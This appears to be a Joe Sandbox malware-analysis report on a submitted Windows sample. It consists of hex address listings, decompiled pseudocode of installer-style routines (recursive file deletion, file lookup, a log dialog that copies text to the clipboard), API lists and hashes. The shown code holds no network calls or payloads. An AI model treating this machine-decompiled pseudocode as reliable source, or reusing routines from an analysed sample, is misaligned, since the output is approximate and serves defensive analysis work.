                                                            0x00000000
                                                            0x73c32458
                                                            0x73c32442
                                                            0x73c32446
                                                            0x00000000
                                                            0x00000000
                                                            0x73c32448
                                                            0x73c3244a
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x73c3244a
                                                            0x73c3230e
                                                            0x73c32311
                                                            0x73c32378
                                                            0x73c3237d
                                                            0x73c32382
                                                            0x73c32388
                                                            0x73c32390
                                                            0x73c32390
                                                            0x73c32391
                                                            0x73c32391
                                                            0x73c32399
                                                            0x73c3239e
                                                            0x73c323a2
                                                            0x73c323a4
                                                            0x73c323a9
                                                            0x73c323b1
                                                            0x73c323b6
                                                            0x73c323b8
                                                            0x73c323bd
                                                            0x73c323c3
                                                            0x73c323c9
                                                            0x73c323cc
                                                            0x73c323d1
                                                            0x73c323d6
                                                            0x73c323db
                                                            0x73c323db
                                                            0x73c323df
                                                            0x73c323e3
                                                            0x73c323e5
                                                            0x00000000
                                                            0x00000000
                                                            0x73c323eb
                                                            0x73c323eb
                                                            0x00000000
                                                            0x73c323eb
                                                            0x73c32313
                                                            0x73c32316
                                                            0x73c32335
                                                            0x73c32339
                                                            0x73c3233f
                                                            0x73c32344
                                                            0x73c3234c
                                                            0x73c32351
                                                            0x73c32353
                                                            0x73c32358
                                                            0x73c3235e
                                                            0x73c32364
                                                            0x73c32367
                                                            0x73c3236c
                                                            0x73c32371
                                                            0x00000000
                                                            0x73c32371
                                                            0x73c3231b
                                                            0x00000000
                                                            0x73c32321
                                                            0x73c32323
                                                            0x73c3232c
                                                            0x00000000
                                                            0x73c3232c
                                                            0x73c3231b
                                                            0x73c32901
                                                            0x73c32907
                                                            0x73c3290d
                                                            0x73c32911
                                                            0x73c32a8a
                                                            0x73c32a93
                                                            0x73c32925
                                                            0x73c32927
                                                            0x73c3292a
                                                            0x73c329b5
                                                            0x73c329b5
                                                            0x73c329b8
                                                            0x73c329ba
                                                            0x73c329d7
                                                            0x73c329dd
                                                            0x73c329e3
                                                            0x73c329e5
                                                            0x73c329fc
                                                            0x73c329fc
                                                            0x73c329fc
                                                            0x73c32a04
                                                            0x73c32a09
                                                            0x73c32a11
                                                            0x73c32a13
                                                            0x73c32a15
                                                            0x73c32a18
                                                            0x73c32a1a
                                                            0x73c32a21
                                                            0x73c32a27
                                                            0x73c32a29
                                                            0x73c32a2b
                                                            0x73c32a30
                                                            0x73c32a42
                                                            0x73c32a42
                                                            0x73c32a30
                                                            0x73c32a29
                                                            0x73c32a18
                                                            0x73c32a48
                                                            0x73c32a4c
                                                            0x73c32a56
                                                            0x73c32a57
                                                            0x73c32a5f
                                                            0x73c32a61
                                                            0x73c32a6b
                                                            0x73c32a72
                                                            0x73c32a74
                                                            0x73c32a7e
                                                            0x73c32a84
                                                            0x73c32a84
                                                            0x00000000
                                                            0x00000000
                                                            0x73c32a86
                                                            0x73c32a86
                                                            0x73c32a86
                                                            0x73c32a86
                                                            0x00000000
                                                            0x73c32a86
                                                            0x73c32a76
                                                            0x73c32a76
                                                            0x00000000
                                                            0x73c32a4e
                                                            0x73c32a4e
                                                            0x73c32a54
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x73c32a54
                                                            0x73c32a4c
                                                            0x73c329e8
                                                            0x73c329ee
                                                            0x73c329f4
                                                            0x73c329f6
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x73c329f6
                                                            0x73c329bc
                                                            0x73c329c3
                                                            0x73c329c9
                                                            0x73c329cf
                                                            0x00000000
                                                            0x73c329cf
                                                            0x73c32930
                                                            0x73c32933
                                                            0x73c3299b
                                                            0x73c3299b
                                                            0x73c329a1
                                                            0x73c329a3
                                                            0x00000000
                                                            0x00000000
                                                            0x73c329a9
                                                            0x73c329aa
                                                            0x00000000
                                                            0x73c329af
                                                            0x73c32938
                                                            0x00000000
                                                            0x00000000
                                                            0x73c3293e
                                                            0x73c3293e
                                                            0x73c32941
                                                            0x73c32947
                                                            0x73c32949
                                                            0x73c32952
                                                            0x00000000
                                                            0x00000000
                                                            0x73c32958
                                                            0x73c32960
                                                            0x73c32965
                                                            0x73c3296c
                                                            0x73c32975
                                                            0x73c3297b
                                                            0x73c32981
                                                            0x73c32994
                                                            0x00000000
                                                            0x73c32994

                                                            APIs
                                                              • Part of subcall function 73C312C6: GlobalAlloc.KERNELBASE(00000040,73C311C4,-000000A0), ref: 73C312CE
                                                            • lstrcpyA.KERNEL32(?,?), ref: 73C327C0
                                                            • GlobalAlloc.KERNELBASE(00000040,000014A4), ref: 73C3281B
                                                            • lstrcpyA.KERNEL32(00000008,?), ref: 73C3286B
                                                            • lstrcpyA.KERNEL32(00000408,?), ref: 73C32876
                                                            • GlobalFree.KERNEL32(00000000), ref: 73C32887
                                                            • GlobalFree.KERNEL32(?), ref: 73C32901
                                                            • GlobalFree.KERNEL32(?), ref: 73C32907
                                                            • GlobalFree.KERNEL32(?), ref: 73C3290D
                                                            • GetModuleHandleA.KERNEL32(00000008), ref: 73C329D7
                                                            • LoadLibraryA.KERNEL32(00000008), ref: 73C329E8
                                                            • GetProcAddress.KERNEL32(?,?), ref: 73C32A3C
                                                            • lstrlenA.KERNEL32(00000408), ref: 73C32A57
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000010.00000002.1284018983.0000000073C31000.00000020.00000001.01000000.00000008.sdmp, Offset: 73C30000, based on PE: true
                                                            • Associated: 00000010.00000002.1284008674.0000000073C30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                            • Associated: 00000010.00000002.1284039391.0000000073C34000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                            • Associated: 00000010.00000002.1284051137.0000000073C36000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_16_2_73c30000_file.jbxd
                                                            Similarity
                                                            • API ID: Global$Free$lstrcpy$Alloc$AddressHandleLibraryLoadModuleProclstrlen
                                                            • String ID: :
                                                            • API String ID: 245916457-336475711
                                                            • Opcode ID: d25f2df8ff0adc324e2589109a4fb99fefd5ae9ca4ec9d4e3c3e0e9352a0125f
                                                            • Instruction ID: 2142480f09b700e85bf85a556043c0a1f015f209a7f9cd795f207542c31761e4
                                                            • Opcode Fuzzy Hash: d25f2df8ff0adc324e2589109a4fb99fefd5ae9ca4ec9d4e3c3e0e9352a0125f
                                                            • Instruction Fuzzy Hash: 0A32D27260830A9FDB45DF35C44075ABBF5FF8A314F858A2DE49ACA294DB30D9458B83
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00405A19 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 159filestringCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 857 405a19-405a3f call 405cd7 860 405a41-405a53 DeleteFileA 857->860 861 405a58-405a5f 857->861 862 405be2-405be6 860->862 863 405a61-405a63 861->863 864 405a72-405a82 call 406257 861->864 865 405b90-405b95 863->865 866 405a69-405a6c 863->866 872 405a91-405a92 call 405c30 864->872 873 405a84-405a8f lstrcatA 864->873 865->862 868 405b97-405b9a 865->868 866->864 866->865 870 405ba4-405bac call 4065ce 868->870 871 405b9c-405ba2 868->871 870->862 880 405bae-405bc2 call 405be9 call 4059d1 870->880 871->862 875 405a97-405a9a 872->875 873->875 878 405aa5-405aab lstrcatA 875->878 879 405a9c-405aa3 875->879 881 405ab0-405ace lstrlenA FindFirstFileA 878->881 879->878 879->881 896 405bc4-405bc7 880->896 897 405bda-405bdd call 405378 880->897 882 405ad4-405aeb call 405c14 881->882 883 405b86-405b8a 881->883 890 405af6-405af9 882->890 891 405aed-405af1 882->891 883->865 887 405b8c 883->887 887->865 894 405afb-405b00 890->894 895 405b0c-405b1a call 406257 890->895 891->890 893 405af3 891->893 893->890 899 405b02-405b04 894->899 900 405b65-405b77 FindNextFileA 894->900 907 405b31-405b3c call 4059d1 895->907 908 405b1c-405b24 895->908 896->871 902 405bc9-405bd8 call 405378 call 406030 896->902 897->862 899->895 903 405b06-405b0a 899->903 900->882 905 405b7d-405b80 FindClose 900->905 902->862 903->895 903->900 905->883 916 405b5d-405b60 call 405378 907->916 917 405b3e-405b41 907->917 908->900 911 405b26-405b2f call 405a19 908->911 911->900 916->900 919 405b43-405b53 call 405378 call 406030 917->919 920 405b55-405b5b 917->920 919->900 920->900
                                                            C-Code - Quality: 98%
                                                            			E00405A19(void* __eflags, signed int _a4, signed int _a8) {
				signed int _v8;
				void* _v12;
				signed int _v16;
				struct _WIN32_FIND_DATAA _v336;
				signed int _t40;
				char* _t53;
				signed int _t55;
				signed int _t58;
				signed int _t64;
				signed int _t66;
				void* _t68;
				signed char _t69;
				CHAR* _t71;
				void* _t72;
				CHAR* _t73;
				char* _t76;

				_t69 = _a8;
				_t73 = _a4;
				_v8 = _t69 & 0x00000004;
				_t40 = E00405CD7(__eflags, _t73);
				_v16 = _t40;
				if((_t69 & 0x00000008) != 0) {
					_t66 = DeleteFileA(_t73); // executed
					asm("sbb eax, eax");
					_t68 =  ~_t66 + 1;
					 *0x4524a8 =  *0x4524a8 + _t68;
					return _t68;
				}
				_a4 = _t69;
				_t8 =  &_a4;
				 *_t8 = _a4 & 0x00000001;
				__eflags =  *_t8;
				if( *_t8 == 0) {
					L5:
					E00406257(0x444098, _t73);
					__eflags = _a4;
					if(_a4 == 0) {
						E00405C30(_t73);
					} else {
						lstrcatA(0x444098, "\*.*");
					}
					__eflags =  *_t73;
					if( *_t73 != 0) {
						L10:
						lstrcatA(_t73, 0x40a014);
						L11:
						_t71 =  &(_t73[lstrlenA(_t73)]);
						_t40 = FindFirstFileA(0x444098,  &_v336);
						__eflags = _t40 - 0xffffffff;
						_v12 = _t40;
						if(_t40 == 0xffffffff) {
							L29:
							__eflags = _a4;
							if(_a4 != 0) {
								_t32 = _t71 - 1;
								 *_t32 =  *(_t71 - 1) & 0x00000000;
								__eflags =  *_t32;
							}
							goto L31;
						} else {
							goto L12;
						}
						do {
							L12:
							_t76 =  &(_v336.cFileName);
							_t53 = E00405C14( &(_v336.cFileName), 0x3f);
							__eflags =  *_t53;
							if( *_t53 != 0) {
								__eflags = _v336.cAlternateFileName;
								if(_v336.cAlternateFileName != 0) {
									_t76 =  &(_v336.cAlternateFileName);
								}
							}
							__eflags =  *_t76 - 0x2e;
							if( *_t76 != 0x2e) {
								L19:
								E00406257(_t71, _t76);
								__eflags = _v336.dwFileAttributes & 0x00000010;
								if(__eflags == 0) {
									_t55 = E004059D1(__eflags, _t73, _v8);
									__eflags = _t55;
									if(_t55 != 0) {
										E00405378(0xfffffff2, _t73);
									} else {
										__eflags = _v8 - _t55;
										if(_v8 == _t55) {
											 *0x4524a8 =  *0x4524a8 + 1;
										} else {
											E00405378(0xfffffff1, _t73);
											E00406030(_t72, _t73, 0);
										}
									}
								} else {
									__eflags = (_a8 & 0x00000003) - 3;
									if(__eflags == 0) {
										E00405A19(__eflags, _t73, _a8);
									}
								}
								goto L27;
							}
							_t64 =  *((intOrPtr*)(_t76 + 1));
							__eflags = _t64;
							if(_t64 == 0) {
								goto L27;
							}
							__eflags = _t64 - 0x2e;
							if(_t64 != 0x2e) {
								goto L19;
							}
							__eflags =  *((char*)(_t76 + 2));
							if( *((char*)(_t76 + 2)) == 0) {
								goto L27;
							}
							goto L19;
							L27:
							_t58 = FindNextFileA(_v12,  &_v336);
							__eflags = _t58;
						} while (_t58 != 0);
						_t40 = FindClose(_v12);
						goto L29;
					}
					__eflags =  *0x444098 - 0x5c;
					if( *0x444098 != 0x5c) {
						goto L11;
					}
					goto L10;
				} else {
					__eflags = _t40;
					if(_t40 == 0) {
						L31:
						__eflags = _a4;
						if(_a4 == 0) {
							L39:
							return _t40;
						}
						__eflags = _v16;
						if(_v16 != 0) {
							_t40 = E004065CE(_t73);
							__eflags = _t40;
							if(_t40 == 0) {
								goto L39;
							}
							E00405BE9(_t73);
							_t40 = E004059D1(__eflags, _t73, _v8 | 0x00000001);
							__eflags = _t40;
							if(_t40 != 0) {
								return E00405378(0xffffffe5, _t73);
							}
							__eflags = _v8;
							if(_v8 == 0) {
								goto L33;
							}
							E00405378(0xfffffff1, _t73);
							return E00406030(_t72, _t73, 0);
						}
						L33:
						 *0x4524a8 =  *0x4524a8 + 1;
						return _t40;
					}
					__eflags = _t69 & 0x00000002;
					if((_t69 & 0x00000002) == 0) {
						goto L31;
					}
					goto L5;
				}
			}



















                                                            0x00405a23
                                                            0x00405a28
                                                            0x00405a31
                                                            0x00405a34
                                                            0x00405a3c
                                                            0x00405a3f
                                                            0x00405a42
                                                            0x00405a4a
                                                            0x00405a4c
                                                            0x00405a4d
                                                            0x00000000
                                                            0x00405a4d
                                                            0x00405a58
                                                            0x00405a5b
                                                            0x00405a5b
                                                            0x00405a5b
                                                            0x00405a5f
                                                            0x00405a72
                                                            0x00405a79
                                                            0x00405a7e
                                                            0x00405a82
                                                            0x00405a92
                                                            0x00405a84
                                                            0x00405a8a
                                                            0x00405a8a
                                                            0x00405a97
                                                            0x00405a9a
                                                            0x00405aa5
                                                            0x00405aab
                                                            0x00405ab0
                                                            0x00405ac0
                                                            0x00405ac2
                                                            0x00405ac8
                                                            0x00405acb
                                                            0x00405ace
                                                            0x00405b86
                                                            0x00405b86
                                                            0x00405b8a
                                                            0x00405b8c
                                                            0x00405b8c
                                                            0x00405b8c
                                                            0x00405b8c
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00405ad4
                                                            0x00405ad4
                                                            0x00405add
                                                            0x00405ae3
                                                            0x00405ae8
                                                            0x00405aeb
                                                            0x00405aed
                                                            0x00405af1
                                                            0x00405af3
                                                            0x00405af3
                                                            0x00405af1
                                                            0x00405af6
                                                            0x00405af9
                                                            0x00405b0c
                                                            0x00405b0e
                                                            0x00405b13
                                                            0x00405b1a
                                                            0x00405b35
                                                            0x00405b3a
                                                            0x00405b3c
                                                            0x00405b60
                                                            0x00405b3e
                                                            0x00405b3e
                                                            0x00405b41
                                                            0x00405b55
                                                            0x00405b43
                                                            0x00405b46
                                                            0x00405b4e
                                                            0x00405b4e
                                                            0x00405b41
                                                            0x00405b1c
                                                            0x00405b22
                                                            0x00405b24
                                                            0x00405b2a
                                                            0x00405b2a
                                                            0x00405b24
                                                            0x00000000
                                                            0x00405b1a
                                                            0x00405afb
                                                            0x00405afe
                                                            0x00405b00
                                                            0x00000000
                                                            0x00000000
                                                            0x00405b02
                                                            0x00405b04
                                                            0x00000000
                                                            0x00000000
                                                            0x00405b06
                                                            0x00405b0a
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00405b65
                                                            0x00405b6f
                                                            0x00405b75
                                                            0x00405b75
                                                            0x00405b80
                                                            0x00000000
                                                            0x00405b80
                                                            0x00405a9c
                                                            0x00405aa3
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00405a61
                                                            0x00405a61
                                                            0x00405a63
                                                            0x00405b90
                                                            0x00405b92
                                                            0x00405b95
                                                            0x00405be6
                                                            0x00405be6
                                                            0x00405be6
                                                            0x00405b97
                                                            0x00405b9a
                                                            0x00405ba5
                                                            0x00405baa
                                                            0x00405bac
                                                            0x00000000
                                                            0x00000000
                                                            0x00405baf
                                                            0x00405bbb
                                                            0x00405bc0
                                                            0x00405bc2
                                                            0x00000000
                                                            0x00405bdd
                                                            0x00405bc4
                                                            0x00405bc7
                                                            0x00000000
                                                            0x00000000
                                                            0x00405bcc
                                                            0x00000000
                                                            0x00405bd3
                                                            0x00405b9c
                                                            0x00405b9c
                                                            0x00000000
                                                            0x00405b9c
                                                            0x00405a69
                                                            0x00405a6c
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00405a6c

                                                            APIs
                                                            • DeleteFileA.KERNELBASE(?,?,75572754,00485000,0047B000), ref: 00405A42
                                                            • lstrcatA.KERNEL32(00444098,\*.*,00444098,?,?,75572754,00485000,0047B000), ref: 00405A8A
                                                            • lstrcatA.KERNEL32(?,0040A014,?,00444098,?,?,75572754,00485000,0047B000), ref: 00405AAB
                                                            • lstrlenA.KERNEL32(?,?,0040A014,?,00444098,?,?,75572754,00485000,0047B000), ref: 00405AB1
                                                            • FindFirstFileA.KERNEL32(00444098,?,?,?,0040A014,?,00444098,?,?,75572754,00485000,0047B000), ref: 00405AC2
                                                            • FindNextFileA.KERNEL32(00000000,00000010,000000F2,?,?,?,00000000,?,?,0000003F), ref: 00405B6F
                                                            • FindClose.KERNEL32(00000000), ref: 00405B80
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000010.00000002.1283301112.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000010.00000002.1283280375.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283325225.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.0000000000410000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.0000000000414000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.000000000041E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.000000000042A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.0000000000438000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.0000000000448000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.000000000045B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.000000000047D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.000000000047F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.00000000004BB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.00000000004F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283508181.00000000004F7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_16_2_400000_file.jbxd
                                                            Similarity
                                                            • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                            • String ID: \*.*
                                                            • API String ID: 2035342205-1173974218
                                                            • Opcode ID: 72fcfd17838b05b299cf9498f91550db9d519d78778f82521e10bef42cbcf41b
                                                            • Instruction ID: 7373f7c24065ba85377ce78181eb49bf834506ffe63cf7a55ce9c7ac78545b15
                                                            • Opcode Fuzzy Hash: 72fcfd17838b05b299cf9498f91550db9d519d78778f82521e10bef42cbcf41b
                                                            • Instruction Fuzzy Hash: 4651DE30904A08AADB22AB618C89BAF7B78DF42314F24417BF441752D2C77CA981DE6D
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 004065CE Relevance: 3.0, APIs: 2, Instructions: 14fileCOMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 100%
                                                            			E004065CE(CHAR* _a4) {
				void* _t2;

				_t2 = FindFirstFileA(_a4, 0x4480e0); // executed
				if(_t2 == 0xffffffff) {
					return 0;
				}
				FindClose(_t2); // executed
				return 0x4480e0;
			}




                                                            0x004065d9
                                                            0x004065e2
                                                            0x00000000
                                                            0x004065ef
                                                            0x004065e5
                                                            0x00000000

                                                            APIs
                                                            • FindFirstFileA.KERNELBASE(00000020,004480E0,00446098,00405D1A,00446098,00446098,00000000,00446098,00446098,T'Wu,?,00485000,00405A39,?,75572754,00485000), ref: 004065D9
                                                            • FindClose.KERNELBASE(00000000), ref: 004065E5
                                                            Memory Dump Source
                                                            • Source File: 00000010.00000002.1283301112.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000010.00000002.1283280375.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283325225.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.0000000000410000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.0000000000414000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.000000000041E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.000000000042A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.0000000000438000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.0000000000448000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.000000000045B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.000000000047D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.000000000047F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.00000000004BB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.00000000004F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283508181.00000000004F7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_16_2_400000_file.jbxd
                                                            Similarity
                                                            • API ID: Find$CloseFileFirst
                                                            • String ID:
                                                            • API String ID: 2295610775-0
                                                            • Opcode ID: 91897166837ccdaf6e79e8037e8f47a8f79e1353e4b75f269b86cd68fbfe55b9
                                                            • Instruction ID: fd41d54537010d52f50df7b9b8b9e3478e19d392ae6c51f4a024acc321f66cb9
                                                            • Opcode Fuzzy Hash: 91897166837ccdaf6e79e8037e8f47a8f79e1353e4b75f269b86cd68fbfe55b9
                                                            • Instruction Fuzzy Hash: 89D01231514520ABD7516B38BD0C85B7A58AF053313228A3AF066F22E4CF34CC22969C
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 004054B6 Relevance: 54.3, APIs: 36, Instructions: 282windowclipboardmemoryCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 144 4054b6-4054d2 145 405661-405667 144->145 146 4054d8-40559f GetDlgItem * 3 call 404309 call 404bfa GetClientRect GetSystemMetrics SendMessageA * 2 144->146 148 405691-40569d 145->148 149 405669-40568b GetDlgItem CreateThread CloseHandle 145->149 166 4055a1-4055bb SendMessageA * 2 146->166 167 4055bd-4055c0 146->167 151 4056bf-4056c5 148->151 152 40569f-4056a5 148->152 149->148 156 4056c7-4056cd 151->156 157 40571a-40571d 151->157 154 4056e0-4056e7 call 40433b 152->154 155 4056a7-4056ba ShowWindow * 2 call 404309 152->155 170 4056ec-4056f0 154->170 155->151 161 4056f3-405703 ShowWindow 156->161 162 4056cf-4056db call 4042ad 156->162 157->154 159 40571f-405725 157->159 159->154 168 405727-40573a SendMessageA 159->168 164 405713-405715 call 4042ad 161->164 165 405705-40570e call 405378 161->165 162->154 164->157 165->164 166->167 173 4055d0-4055e7 call 4042d4 167->173 174 4055c2-4055ce SendMessageA 167->174 175 405740-40576c CreatePopupMenu call 4062ea AppendMenuA 168->175 176 405837-405839 168->176 183 4055e9-4055fd ShowWindow 173->183 184 40561d-40563e GetDlgItem SendMessageA 173->184 174->173 181 405781-405797 TrackPopupMenu 175->181 182 40576e-40577e GetWindowRect 175->182 176->170 181->176 186 40579d-4057b7 181->186 182->181 187 40560c 183->187 188 4055ff-40560a ShowWindow 183->188 184->176 185 405644-40565c SendMessageA * 2 184->185 185->176 189 4057bc-4057d7 SendMessageA 186->189 190 405612-405618 call 404309 187->190 188->190 189->189 191 4057d9-4057f9 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 189->191 190->184 193 4057fb-40581b SendMessageA 191->193 193->193 194 40581d-405831 GlobalUnlock SetClipboardData CloseClipboard 193->194 194->176
                                                            C-Code - Quality: 95%
                                                            			E004054B6(struct HWND__* _a4, long _a8, long _a12, unsigned int _a16) {
				struct HWND__* _v8;
				struct tagRECT _v24;
				void* _v32;
				signed int _v36;
				int _v40;
				int _v44;
				signed int _v48;
				int _v52;
				void* _v56;
				void* _v64;
				void* __ebx;
				void* __edi;
				void* __esi;
				struct HWND__* _t89;
				long _t90;
				int _t95;
				void* _t102;
				intOrPtr _t113;
				void* _t121;
				intOrPtr _t124;
				struct HWND__* _t128;
				int _t150;
				int _t153;
				long _t157;
				struct HWND__* _t161;
				struct HMENU__* _t163;
				long _t165;
				void* _t166;
				char* _t167;
				char* _t168;
				int _t169;

				_t157 = _a8;
				_t150 = 0;
				_v8 =  *0x44e404;
				if(_t157 != 0x110) {
					if(_t157 == 0x405) {
						_t121 = CreateThread(0, 0, E0040544A, GetDlgItem(_a4, 0x3ec), 0,  &_a8); // executed
						CloseHandle(_t121);
					}
					if(_t157 != 0x111) {
						L17:
						if(_t157 != 0x404) {
							L25:
							if(_t157 != 0x7b) {
								goto L20;
							}
							_t89 = _v8;
							if(_a12 != _t89) {
								goto L20;
							}
							_t90 = SendMessageA(_t89, 0x1004, _t150, _t150);
							_a12 = _t90;
							if(_t90 <= _t150) {
								L36:
								return 0;
							}
							_t163 = CreatePopupMenu();
							AppendMenuA(_t163, _t150, 1, E004062EA(_t150, _t157, _t163, _t150, 0xffffffe1));
							_t95 = _a16;
							_t153 = _a16 >> 0x10;
							if(_a16 == 0xffffffff) {
								GetWindowRect(_v8,  &_v24);
								_t95 = _v24.left;
								_t153 = _v24.top;
							}
							if(TrackPopupMenu(_t163, 0x180, _t95, _t153, _t150, _a4, _t150) == 1) {
								_t165 = 1;
								_v56 = _t150;
								_v44 = 0x43c090;
								_v40 = 0x8000;
								_a4 = _a12;
								do {
									_a4 = _a4 - 1;
									_t165 = _t165 + SendMessageA(_v8, 0x102d, _a4,  &_v64) + 2;
								} while (_a4 != _t150);
								OpenClipboard(_t150);
								EmptyClipboard();
								_t102 = GlobalAlloc(0x42, _t165);
								_a4 = _t102;
								_t166 = GlobalLock(_t102);
								do {
									_v44 = _t166;
									_t167 = _t166 + SendMessageA(_v8, 0x102d, _t150,  &_v64);
									 *_t167 = 0xd;
									_t168 = _t167 + 1;
									 *_t168 = 0xa;
									_t166 = _t168 + 1;
									_t150 = _t150 + 1;
								} while (_t150 < _a12);
								GlobalUnlock(_a4);
								SetClipboardData(1, _a4);
								CloseClipboard();
							}
							goto L36;
						}
						if( *0x44e3ec == _t150) {
							ShowWindow( *0x452428, 8);
							if( *0x4524ac == _t150) {
								_t113 =  *0x438068; // 0x601114
								E00405378( *((intOrPtr*)(_t113 + 0x34)), _t150);
							}
							E004042AD(1);
							goto L25;
						}
						 *0x436060 = 2;
						E004042AD(0x78);
						goto L20;
					} else {
						if(_a12 != 0x403) {
							L20:
							return E0040433B(_t157, _a12, _a16);
						}
						ShowWindow( *0x44e3f0, _t150);
						ShowWindow(_v8, 8);
						E00404309(_v8);
						goto L17;
					}
				}
				_v48 = _v48 | 0xffffffff;
				_v36 = _v36 | 0xffffffff;
				_t169 = 2;
				_v56 = _t169;
				_v52 = 0;
				_v44 = 0;
				_v40 = 0;
				asm("stosd");
				asm("stosd");
				_t124 =  *0x452430;
				_a12 =  *((intOrPtr*)(_t124 + 0x5c));
				_a8 =  *((intOrPtr*)(_t124 + 0x60));
				 *0x44e3f0 = GetDlgItem(_a4, 0x403);
				 *0x44e3e8 = GetDlgItem(_a4, 0x3ee);
				_t128 = GetDlgItem(_a4, 0x3f8);
				 *0x44e404 = _t128;
				_v8 = _t128;
				E00404309( *0x44e3f0);
				 *0x44e3f4 = E00404BFA(4);
				 *0x44e40c = 0;
				GetClientRect(_v8,  &_v24);
				_v48 = _v24.right - GetSystemMetrics(_t169);
				SendMessageA(_v8, 0x101b, 0,  &_v56);
				SendMessageA(_v8, 0x1036, 0x4000, 0x4000); // executed
				if(_a12 >= 0) {
					SendMessageA(_v8, 0x1001, 0, _a12);
					SendMessageA(_v8, 0x1026, 0, _a12);
				}
				if(_a8 >= _t150) {
					SendMessageA(_v8, 0x1024, _t150, _a8);
				}
				_push( *((intOrPtr*)(_a16 + 0x30)));
				_push(0x1b);
				E004042D4(_a4);
				if(( *0x452438 & 0x00000003) != 0) {
					ShowWindow( *0x44e3f0, _t150); // executed
					if(( *0x452438 & 0x00000002) != 0) {
						 *0x44e3f0 = _t150;
					} else {
						ShowWindow(_v8, 8); // executed
					}
					E00404309( *0x44e3e8);
				}
				_t161 = GetDlgItem(_a4, 0x3ec);
				SendMessageA(_t161, 0x401, _t150, 0x75300000);
				if(( *0x452438 & 0x00000004) != 0) {
					SendMessageA(_t161, 0x409, _t150, _a8);
					SendMessageA(_t161, 0x2001, _t150, _a12);
				}
				goto L36;
			}


































                                                            0x004054c4
                                                            0x004054c7
                                                            0x004054cf
                                                            0x004054d2
                                                            0x00405667
                                                            0x00405684
                                                            0x0040568b
                                                            0x0040568b
                                                            0x0040569d
                                                            0x004056bf
